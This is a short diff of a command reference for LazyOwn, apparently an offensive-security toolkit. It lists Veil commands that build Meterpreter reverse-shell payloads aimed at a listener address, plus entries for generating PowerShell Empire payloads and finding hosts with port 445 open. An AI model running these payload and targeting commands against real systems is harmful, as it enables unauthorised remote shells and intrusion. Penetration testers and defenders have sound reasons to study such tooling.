grisuno/LazyOwn/COMMANDS.md

     veil python_meterpreter_rev_https LHOST=192.168.1.100 LPORT=443
     veil ruby_meterpreter_rev_tcp LHOST=192.168.1.100 LPORT=4444

+## empire
+Generates payloads using PowerShell Empire with various options.

+:param line: Not used in this implementation but reserved for future use.

+:returns: None

 ## find_tgts
 Finds and returns a list of target hosts with port 445 open in the specified subnet.